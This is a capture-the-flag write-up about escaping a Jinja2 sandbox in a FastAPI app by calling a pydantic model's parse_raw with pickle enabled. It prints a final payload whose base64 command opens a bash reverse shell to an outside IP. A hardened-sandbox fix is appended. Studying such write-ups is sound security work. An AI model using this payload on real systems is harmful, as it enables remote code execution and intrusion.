Challenge description
Analysis
The directory structure of the downloaded attachment is as follows:
Source code:
from jinja2.sandbox import SandboxedEnvironment
from jinja2.exceptions import UndefinedError
from fastapi import FastAPI, Form
from fastapi.responses import HTMLResponse
from pydantic import BaseModel
from typing_extensions import Annotated
from typing import Union

app = FastAPI()


class User(BaseModel):
    name: str
    description: Union[str, None] = None
    age: int


class Template(BaseModel):
    source: str


@app.get("/", response_class=HTMLResponse)
def index():
    return """xxx前端代码忽略"""


@app.get("/preview", response_class=HTMLResponse)
def preview_page():
    return """xxx前端代码忽略"""


@app.post("/preview", response_class=HTMLResponse)
def submit_preview(template: Template, user: User):
    env = SandboxedEnvironment()
    try:
        preview = env.from_string(template.source).render(user=user)
        return preview
    except UndefinedError as e:
        return e
Start the service locally and debug it:
When the request data is parsed, the BaseModel subclass is passed in as the default parameter, so the user object handed to the template is a pydantic model and every BaseModel method (parse_raw included) is reachable from inside the sandbox.
Set a breakpoint.
Here it goes straight into pickle.load.
payload:
{
    "user": {"name": "John", "description": "aaa", "age": "18"},
    "template": {"source": "exp"}
}
exp:
user.parse_raw(b=\"cmd\",allow_pickle=true,content_type='pickle')
cmd:
(S'command to execute'\nios\nsystem\n.
Final payload:
{"user":{"name":"John","description":"","age":"18"},"template":{"source":"{{user.parse_raw(b=\"(S'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjI1MC4xNDQvODA4MCAwPiYx|base64 -d|bash -i'\nios\nsystem\n.\",allow_pickle=true,content_type=\"Protocol.pickle\")}}"}}
Flag:
R3CTF{D0CuM3NTa7lOn_l5_Ur_63st_1RieND_434eaea8aa0a}
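As a defender's counterpart to the bug above, here is an added example (not part of the original writeup or the challenge source) showing the two fixes a practitioner would apply to submit_preview: hand the template plain data instead of the pydantic model, and subclass SandboxedEnvironment so it refuses the model's parse_* methods and any other method on context objects. The User dataclass is a hypothetical stand-in for the challenge's pydantic model, and jinja2 is assumed to be installed.

```python
import dataclasses
import json

from jinja2.exceptions import SecurityError, UndefinedError
from jinja2.sandbox import SandboxedEnvironment

# pydantic BaseModel (v1 and v2) names that build objects from caller input.
DENIED_ATTRS = frozenset({
    "parse_raw", "parse_obj", "parse_file", "construct", "from_orm",
    "model_validate", "model_validate_json", "model_construct",
})
PLAIN_TYPES = (str, bytes, int, float, bool, list, tuple, dict, type(None))


class LockedDownSandbox(SandboxedEnvironment):
    """Sandbox that also refuses the deny-list above and any callable found
    on a non-primitive object (a model instance or class)."""

    def is_safe_attribute(self, obj, attr, value):
        if attr in DENIED_ATTRS:
            return False
        if callable(value) and not isinstance(obj, PLAIN_TYPES):
            return False
        return super().is_safe_attribute(obj, attr, value)


@dataclasses.dataclass
class User:
    """Hypothetical stand-in for the challenge's pydantic User model."""
    name: str
    age: int
    description: str = ""

    @classmethod
    def parse_raw(cls, b, **_ignored):
        # Mirrors the classmethod the exploit reaches; pydantic's real one
        # also hands the bytes to pickle.loads when allow_pickle=True.
        return cls(**json.loads(b))


def naive_render(source: str, user: User) -> str:
    """The challenge's pattern: the model object itself goes into the sandbox."""
    return SandboxedEnvironment().from_string(source).render(user=user)


def render_preview(source: str, user: User) -> str:
    """Hardened counterpart: primitives only, deny-list on, no error echo."""
    context = {"user": dataclasses.asdict(user)}  # data only, no methods
    try:
        return LockedDownSandbox().from_string(source).render(**context)
    except (UndefinedError, SecurityError):
        return "template error"
```

With the model object, the stock sandbox happily calls user.parse_raw from a template; with the dict context the attribute does not exist, and even if a model object slips through, LockedDownSandbox raises SecurityError instead of calling it.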